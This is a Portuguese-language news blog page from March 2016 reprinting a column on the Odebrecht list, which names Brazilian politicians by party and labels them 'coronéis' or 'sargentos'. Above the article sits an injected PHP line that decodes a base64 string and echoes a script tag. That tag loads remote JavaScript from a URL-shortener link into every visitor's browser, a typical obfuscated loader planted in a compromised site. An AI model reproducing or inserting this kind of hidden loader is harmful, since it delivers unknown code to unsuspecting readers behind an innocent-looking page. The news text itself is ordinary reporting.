$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Pela lista da Odebrecht, PMDB é o “líder dos coronéis”

Pela lista da Odebrecht, PMDB é o “líder dos coronéis”
24 Mar 2016

Denise Rothenburg – Correio Braziliense

Quem pensa que acabou o período dos coronéis é bom prestar bastante atenção à lista da Odebrecht, que embaralhou novamente as cartas da crise. Quem tem mais políticos de alta patente, com a “função” de “coronel”, segundo a empreiteira, é o PMDB. Lá estão José Sarney, Henrique Alves, Romero Jucá, Sério Cabral, Eduardo Cunha, Luiz Fernando Pezão, Jorge Picciani e Renan Calheiros.

O PT também tem os seus: Marco Maia, o ex-ministro Paulo Bernardo, a senadora Gleisi Hoffmann, o senador Lindbergh Farias e, Jaques Pena, do Distrito Federal. No PSDB, lá estão Teotônio Vilela e Bruno Araújo. No PP, o ex-ministro Aguinaldo Ribeiro e o ex-senador Francisco Dornelles. No DEM, José Agripino. No PV, Alfedo Sirkis. O PSB tem Beto Albuquerque, candidato a vice de Marina Silva em 2014, depois da morte de Eduardo Campos.

Estrelas da oposição, como Raul Jungman (PPS-PE) e Jarbas Vasconcelos (PMDB-PE), são citados como simples “sargentos’.

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *